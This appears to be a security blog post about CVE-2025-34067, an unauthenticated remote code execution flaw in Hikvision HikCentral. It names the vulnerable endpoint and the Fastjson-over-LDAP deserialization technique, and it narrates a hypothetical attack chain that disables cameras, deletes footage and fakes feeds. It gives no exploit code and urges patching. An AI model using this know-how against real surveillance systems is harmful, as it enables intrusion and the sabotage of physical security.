Critical Hikvision Flaw Exposes Entire Camera Networks to Remote Takeover
In mid-2025, security researchers uncovered a critical vulnerability in Hikvision's HikCentral Professional software—identified as CVE‑2025‑34067—that received a maximum severity score of CVSS 4.0 = 10.0. This rating represents the highest possible level of danger in the Common Vulnerability Scoring System, indicating that the flaw is:
Remotely exploitable over the network (AV:N)
Low complexity to exploit (AC:L)
Requires no authentication (PR:N)
Grants complete control over the system (VC:H, SC:H, SA:H)
The vulnerability exists in the applyCT endpoint (/bic/ssoService/v1/applyCT) of HikCentral, where an attacker can exploit unsafe deserialization using the outdated Fastjson library. By submitting specially crafted JSON data pointing to an attacker-controlled LDAP server, it's possible to execute arbitrary code on the target system without any prior access or authentication.
Because HikCentral is widely used in enterprise environments to manage thousands of security cameras, access control systems, and integrated security workflows, exploitation of this flaw could result in complete takeover of a physical security infrastructure.
This blog post examines the technical nature of CVE‑2025‑34067, explores possible attack vectors, compares it to past Hikvision vulnerabilities, and highlights what attackers could realistically achieve—from disabling surveillance to manipulating video feeds or silently observing facilities in real time.
What Is CVE‑2025‑34067 — and Why Is It a 10.0?
At the heart of the chaos was CVE‑2025‑34067, a newly disclosed unauthenticated Remote Code Execution (RCE) flaw in Hikvision’s applyCT (HikCentral) platform. Scored CVSS 4.0 = 10.0, it represents the most critical threat level, meaning an attacker needs zero credentials, zero interaction, and can cause total compromise over any affected device across the network
Unpacking the danger:
Networking attack vector (AV:N): Can be triggered over the internet.
Low complexity (AC:L): No special conditions needed.
Unauthenticated (PR:N/UI:N): Anyone can hit the endpoint.
Complete system compromise (VC:H…SA:H): Full access to containers, services, cameras, feeds—and beyond
Fastjson’s auto-type feature embedded in /bic/ssoService/v1/applyCT trusts unverified JSON input. By sending payloads referencing malicious Java classes (like JdbcRowSetImpl) via an attacker-controlled LDAP server, the attacker achieves full RCE.
A Potential Exploit Attack
Recon & Prepping the Payload
Our hacker, “ShadowBroker42,” scans the internet for exposed HikCentral servers. They find one, vulnerable and wide open. Using a public PoC exploit that crafts JSON pointing to their LDAP server, RCE is executed silently.
Gaining Foothold & Escalation
The payload spawns a shell under the HikCentral service account. They pivot to the host OS, grab domain credentials, and start moving laterally onto camera DVRs, storage systems, even the building’s access control.
Turning Cameras Against You
ShadowBroker42 issues commands to:
Stop camera processes, darkening critical views.
Delete video archives, wiping historical evidence.
Stream live feeds back to themselves, monitoring staff movements.
Manipulate PTZ cameras, aiming them at blind spots or away from intruders.
With full admin privileges, they disable alarm triggers and insert fake feeds—making a real break-in look like nothing.
Keeping in mind that this is just one of many possible attack chains. You could instead lean into ransomware, active monitoring of secure areas (say R&D labs) or anything else that an attacker may find useful.
Surveillance as a Double-Edged Sword: When Cameras Create a False Sense of Security
Many organizations invest heavily in surveillance systems under the assumption that more cameras equal better security. High-resolution IP cameras, centralized monitoring platforms like HikCentral, and motion-triggered recording give the impression of a watchful, evidence-rich environment. But that confidence is often misplaced—particularly when camera systems are not designed with adversarial threats in mind.
The belief that cameras automatically make spaces safer overlooks a critical reality: surveillance systems can be turned against you just as easily as they can help you, especially when systems are poorly configured, unpatched, or trusted blindly without verification.
This issue is not limited to software vulnerabilities like CVE‑2025‑34067, which allow attackers to remotely compromise and take control of the camera network. Even the intended functionality of a surveillance system can become a liability.
Take, for example, a key operational weakness described in The Man Who Wasn’t There: the assumption that recorded video footage will always be available when needed. Here I outline how modern HD surveillance systems generate massive amounts of data, especially when recording continuously at high resolution. As a result, most organizations only retain footage for a few days before older data is overwritten to save disk space.
This creates a dangerous window of vulnerability:
If an attacker is not detected quickly,
If logs and footage are not reviewed within a short time frame,
Then any trace of their presence may be lost forever.
This is another example of how an attacker could exploit this exact limitation. They entered a secured facility, conducted their operation without being noticed, and because the intrusion wasn’t flagged within the short retention period, the surveillance system recorded over the only evidence of the breach. No forensic trail. No way to review camera footage. It was as if the intruder had never been there at all.
This isn’t a CVE, but it is a vulnerability which many are unaware of. It reflects a common misunderstanding: that having cameras means you have security. In reality, without strong retention policies, threat detection capabilities, and proactive monitoring, surveillance systems can lull organizations into a false sense of control.
Conclusion
With a CVSS score of 10.0, it represents the highest level of risk, enabling adversaries to disable cameras, delete video evidence, and monitor live feeds without ever being detected.
Organizations relying on Hikvision infrastructure must treat this vulnerability as an urgent priority and take immediate action to patch, isolate, and harden their surveillance systems.
For Black Teams, this is a vulnerability you should be aware of, and for auditors ensure you check for this and offer remediation
Didn't expect you to cover a software vuln. Nice job!